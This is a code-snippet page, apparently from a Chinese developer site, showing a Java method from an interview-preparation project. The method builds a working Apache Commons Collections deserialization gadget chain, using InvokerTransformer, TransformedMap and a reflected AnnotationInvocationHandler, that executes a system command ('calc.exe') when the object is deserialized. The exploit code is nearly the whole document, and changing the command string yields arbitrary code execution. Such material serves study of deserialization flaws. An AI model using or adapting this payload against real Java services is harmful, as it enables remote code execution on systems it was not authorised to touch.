App.java 文件源码

java
阅读 41 收藏 0 点赞 0 评论 0
项目:interview-question-code 作者: 
public static Object Reverse_Payload() throws Exception {
    Transformer[] transformers = new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod", new Class[]{String.class, Class[].class},
                    new Object[]{"getRuntime", new Class[0]}),
            new InvokerTransformer("invoke", new Class[]{Object.class, Object[].class},
                    new Object[]{null, new Object[0]}),
            new InvokerTransformer("exec", new Class[]{String.class},
                    new Object[]{"calc.exe"})};
    Transformer transformerChain = new ChainedTransformer(transformers);

    Map pocMap = new HashMap();
    pocMap.put("value", "value");
    Map outmap = TransformedMap.decorate(pocMap, null, transformerChain);
    //通过反射获得AnnotationInvocationHandler类对象
    Class cls = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
    //通过反射获得cls的构造函数
    Constructor ctor = cls.getDeclaredConstructor(Class.class, Map.class);
    //这里需要设置Accessible为true,否则序列化失败
    ctor.setAccessible(true);
    //通过newInstance()方法实例化对象
    Object instance = ctor.newInstance(Retention.class, outmap);
    return instance;
}
您未登录,请先登录后再评论
评论列表
文章目录


问题


面经


文章

微信
公众号

扫码关注公众号